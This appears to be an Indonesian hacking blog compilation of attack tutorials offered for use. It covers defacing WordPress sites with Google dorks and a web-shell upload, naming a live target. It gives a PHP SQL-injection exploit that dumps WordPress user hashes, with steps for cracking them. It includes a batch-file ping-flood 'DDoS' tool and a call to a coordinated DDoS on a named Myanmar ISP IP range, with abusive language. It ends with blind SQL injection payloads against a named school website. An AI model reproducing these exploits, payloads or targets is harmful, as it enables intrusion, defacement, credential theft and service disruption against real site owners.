Deface With CSRF

Assalamualaikum :)
Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D

Bahan-Bahan:

1. Download Script CSRF
===============================================================
DOWNLOAD DISINI  Password: Lihat
===============================================================
Note: Aktifkan Java Script untuk download!!

2. Download MadspotShell Disini Extraxk dulu dari file Rar!

3. Cari target dengan DORK :

• inurl:/wp-content/themes/shepard
• inurl:/wp-content/themes/money
• inurl:/wp-content/themes/clockstone
• inurl:/wp-content/themes/ambleside
• inurl:/wp-content/themes/pacifico

#Dork dikembangkan sendiri ya :)

4. Live Target (WEB Target buat coba2 PM Onix AQua)

#Persiapan sudah selesai, sekarang tinggal kita eksekusi :)

Langkah- Langkah:

1. Masukan Dork ke dalam google (kurang jelas lihat gambar)

2. Pilih salah satu target yang kita dapat tadi (Kurang jelas lihat gambar)

Contoh :

http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadi http://www.robertcarpentry.com/wp-content/themes/pacifico/theme

3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"

Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p  "Jika muncul "error" berarti Web target Vulnerable" ;p

4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET  dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!

Contoh: "http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"

5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .

Jika berhasil maka akan muncul seperti ini (lihat gambar)

6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini

#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)

Sumber : Click

Hacking password login wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection

Pada tutorial saat ini penulis akan membahas tentang cara Hacking password login wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection.
Plugin ini didasarkan dari situs penyedianya di http://wordpress.org/extend/plugins/store-locator-le/, fiturnya sebagai berikut :

    You can use it for a variety of countries, as supported by Google Maps.
    The Store Pages add-on allows you to connect each of your locations with a WordPress page — so you can add hours, images and more!
    Supports international languages and character sets.
    Allows you to use unique map icons or your own custom map icons.
    Change default map settings via the admin panel including:
    Map type (terrain, satellite, street, etc.)
    Inset map show/hide
    Starting zoom level
    You can use miles or kilometers
    Pulldown list of cities and/or countries on search form can be toggled on/off.
    Bulk upload your locations via the CSV loader.
    Location search tracking and reporting, find out what your visitors are looking for.
    Popup email form.

Plugin ini cukup populer, berikut ratingnya.


Penulis menggunakan exploit yang dibuat oleh Sammy FORGIT – sam at opensyscom dot fr -http://www.opensyscom.fr.
Sebagai berikut exploitnya :

<?php
$ch =
curl_init(“http://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php”);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array(‘query’=>”SELECT * FROM wp_users”,
     ‘filename’=>’test’,
     ‘all’=>’true’));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>

Simpan source code tersebut dengan ekstensi php ke 1 folder dengan program php.exe dari webserver apache. Disini penulis menyimpannya dengan nama wppasnow.php.

Untuk melakukan exploitasinya sebagai berikut :


Username dan password dalam bentuk hash sudah didapat, tinggal kita pecahkan password tersebut dengan WordPress PasswordHash Attack Tool yang dapat di download di http://dl.packetstormsecurity.net/Crackers/wp-hash.txt, untuk dictionary filenya dapat membuat sendiri atau dicari disitus-situs hacking.

Penulis langsung saja mencoba, ganti nilai varibel $hasP sebelumnya dengan password wordpress dalam bentuk hash yang kita dapat dari exploit yang telah dilakukan. Ganti juga nama file dictionary untuk brute dengan file dictionary milik anda.

Untuk di tempat penulis sebagai berikut :


Setelah itu tinggal di simpan lalu dijalankan seperti berikut :


Binggo, password telah didapat. Setelah password di temukan maka tinggal login admin wordpress untuk masuk ke halaman admin wordpress.

sumber: Xcode

DDoS with NotePad

Kali ini saya akan mempraktekkan DDOS melalui Notepad. Langsung saja, berikut tutorialnya:

LANGKAH 1:  Copy code-code dibawah ini :

Code:

        @echo off
    mode 67,16
    title DDOS Attack
    color 0a
    cls
    echo.
    echo DDOS With Batchfile
    echo.
    set /p x=Server-Target:
    echo.
    ping %x%
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=ip Host:
    echo.
    set /p n=Packet Size:
    echo.
    DOS
    color 0c
    echo Attacking Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS


LANGKAH 2: Buka application notepad dan paste code-code diatas tadi.

LANGKAH 3: Save file anda seperti dibawah :

File Name : DDoS Attack.bat Save As Type : All File <--- p="p" penting="penting">
    Quote: bisa disave dgn namafile bebas sesuka bro n sist..     tapi ingat , File Extensi harus berformat .Bat


Cara-cara menggunakannya :
1. Double click file anda itu.
2. Akan tertera : Server-Target: Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

    Quote:Contoh :     Sebelum = http://www.google.com/     Tukarkan kepada = www[.]google[.]com

    *hilangkan tanda '[]'.     Setelah memasukkan url itu, tekan enter.


LANGKAH 4: Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.

Setelah selesai ping, akan keluar seperti ini :

Pinging http://www.google.com

[209.85.175.106] with 32 bytes of data:
Reply from 209.85.175.106: bytes=32 time=30ms TTL=56
Reply from 209.85.175.106: bytes=32 time=40ms TTL=55
Reply from 209.85.175.106: bytes=32 time=24ms TTL=56
Reply from 209.85.175.106: bytes=32 time=36ms TTL=56

Ping statistics for 209.85.175.106:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 24ms, Maximum = 40ms, Average = 32ms

209.85.175.106 <----- address="address" bagi="bagi" http:="http:" ip="ip" nbsp="nbsp" p="p" www.google.com="www.google.com">    Quote: cara sama kok untuk web yg lain

4. Selepas itu, akan terpapar di tool itu : ip Host: Masukkan saja ip address yg anda dapat tadi.

Contoh : ip Host:209.85.175.106

dan tekan enter.

5. Pada akhirnya akan keluar pula : Packet Size : Letakkan letakkan semau anda sebagai POWER !

Contoh : Packet Size : 10000000

Dan tekan enter.

6. Akan terpapar : Attacking Server.....

Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

Jika ingin hasil yang maksimal , harus DDOS dengan beberapa komputer biar cepat down targetnya.

Sekian tutorial ini, agar bisa menjadi bahan pembelajaran bagi para Admin Server untuk selalu meningkatkan keamanan servernya. Salah satunya bisa menggunakan DDOS Protection, dll.

Cyber War Indonesia VS myanmar

Sejak kemarin gerakan #OPMyanmar ramai dibicarakan di berbagai sosial media. Itu lantaran Myanmar cari ribut dengan mendeface ratusan situs Indonesia. Untuk motifnya saya sendiri tidak tahu. Yang jelas mereka sudah siap terbakar karena berani bermain api dengan Hacker Indonesia. Disaat 230 situs Indonesia dihajar oleh Myanmar, siapakah yang membalas ?

Apakah polisi cyber Indonesia ? Apakah pemerintah Indonesia ?  Tidak ! Hacker lah yang dengan gigih menjunjung tinggi derajat bangsa ini dengan melakukan gerakan OP Myanmar. Tanpa digaji pun hacker Indonesia akan bahu membahu membalas serangan yang dilakukan oleh Myanmar ! Seperti yang kita ketahui, Myanmar sangat mudah melakukan aksi deface masal ke situs Indonesia karena mereka difasiliatsi untuk itu. Maksudnya ? Ya, situs Indonesia sangat banyak. Jelas sangat mudah jika hanya mencari bug dan kemudian melakukan symlink. Di Indonesia ada google.co.id yang memudahkan mereka melakukan scan terhadap web target. Bandingkan dengan mereka ! Situs Myanmar sedikit ! Di sana tidak ada situs google ! Sangat sulit jika harus masuk lewat celah keamanan ! Oleh karena itu, diputuskan malam ini DDoSer Indonesia akan melakukan balasan dengan meratakan situs-situs Myanmar secara bersama-sama ! Ya, malam ini kami akan melakukan serangan DDoS secara serempak mulai pukul 8 malam ! Silahkan yang ingin ikut berpartisipasi, siapkan Tools DDoS andalan kalian dan kita bakar bersama-sama situs Myanmar ! Semakin banyak yang ikut, semakin besar peluang kita untuk sukses ! Untuk target, nanti akan saya update jam 8 !
Target :

TARGET ATTACK => ISP myanmar
IP address : 203.81.162.13
Port : 25

Host name : mailtx.teleport.net.mm
IP range : 203.81.160.0 - 203.81.164.255 CIDR
ISP Yatanarpon Teleport, Internet Service Provider
Organization Yatanarpon Teleport, Internet Service Provider
Country Myanmar (MM)

Fire... Fire... Fire.... !!!!! Fuck You Myanmar !!!

Blind SQLi

Ane akan mencoba menjelaskan semudah mungkin tentang Blind SQL Injection yang ane anggap rumit banget... Bukannya sok ngajarin atau apalah, disini ane hanya berusaha memberikan apa yang ane punya dan bisa...

 Apa sich Blind SQL Injection tu?



Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita tidak memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


www.smanti.com/berita.php?id=5 and 1=0 <<<false

www.smanti.com/berita.php?id=5 and 1=1 <<<true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...

Sumber : Hacker Newbie.org